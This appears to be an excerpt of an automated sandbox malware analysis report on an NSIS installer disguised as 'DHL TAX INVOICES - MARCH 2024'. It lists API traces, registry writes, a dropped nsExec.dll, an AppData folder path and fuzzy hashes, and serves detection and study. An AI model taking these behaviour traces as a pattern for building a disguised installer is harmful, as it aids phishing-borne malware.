                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 770 4031ef-403217 GetTickCount 771 403347-40334f call 402d9f 770->771 772 40321d-403248 call 40336e SetFilePointer 770->772 777 403351-403355 771->777 778 40324d-40325f 772->778 779 403261 778->779 780 403263-403271 call 403358 778->780 779->780 783 403277-403283 780->783 784 403339-40333c 780->784 785 403289-40328f 783->785 784->777 786 403291-403297 785->786 787 4032ba-4032d6 call 406697 785->787 786->787 788 403299-4032b9 call 402d9f 786->788 793 403342 787->793 794 4032d8-4032e0 787->794 788->787 795 403344-403345 793->795 796 4032e2-4032ea call 405e05 794->796 797 403303-403309 794->797 795->777 801 4032ef-4032f1 796->801 797->793 798 40330b-40330d 797->798 798->793 800 40330f-403322 798->800 800->778 802 403328-403337 SetFilePointer 800->802 803 4032f3-4032ff 801->803 804 40333e-403340 801->804 802->771 803->785 805 403301 803->805 804->795 805->800
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00403203
                                                              • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
                                                            • SetFilePointer.KERNELBASE(0023A243,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer$CountTick
                                                            • String ID: G A
                                                            • API String ID: 1092082344-516626419
                                                            • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                            • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
                                                            • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                            • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 806 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 813 4023c7-4023cf 806->813 814 402a4c-402a5b 806->814 815 4023d1-4023de call 402bbf lstrlenW 813->815 816 4023e2-4023e5 813->816 815->816 818 4023f5-4023f8 816->818 819 4023e7-4023f4 call 402ba2 816->819 824 402409-40241d RegSetValueExW 818->824 825 4023fa-402404 call 4030e7 818->825 819->818 828 402422-4024fc RegCloseKey 824->828 829 40241f 824->829 825->824 828->814 829->828
                                                            APIs
                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                            • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValuelstrlen
                                                            • String ID:
                                                            • API String ID: 1356686001-0
                                                            • Opcode ID: f0e2339e940dc33c402bc398b4ebf085dfa1ba78c2790fe29b119279f0c59b8a
                                                            • Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
                                                            • Opcode Fuzzy Hash: f0e2339e940dc33c402bc398b4ebf085dfa1ba78c2790fe29b119279f0c59b8a
                                                            • Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0,00000000), ref: 00405BEB
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                              • Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\releve,?,00000000,000000F0), ref: 00401645
                                                            Strings
                                                            • C:\Users\user\AppData\Local\releve, xrefs: 00401638
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Local\releve
                                                            • API String ID: 1892508949-2510609794
                                                            • Opcode ID: d84c169ce5b3ecf09dc814364db80869bc74cebb640b1dc805c577dbb1d601e2
                                                            • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
                                                            • Opcode Fuzzy Hash: d84c169ce5b3ecf09dc814364db80869bc74cebb640b1dc805c577dbb1d601e2
                                                            • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406C7B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                            • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
                                                            • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                            • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406E7C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                            • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
                                                            • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                            • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406B92 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                            • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
                                                            • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                            • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406697 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                            • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
                                                            • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                            • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406AE5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                            • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
                                                            • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                            • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406C03 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                            • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
                                                            • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                            • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406B4F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                            • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
                                                            • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                            • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
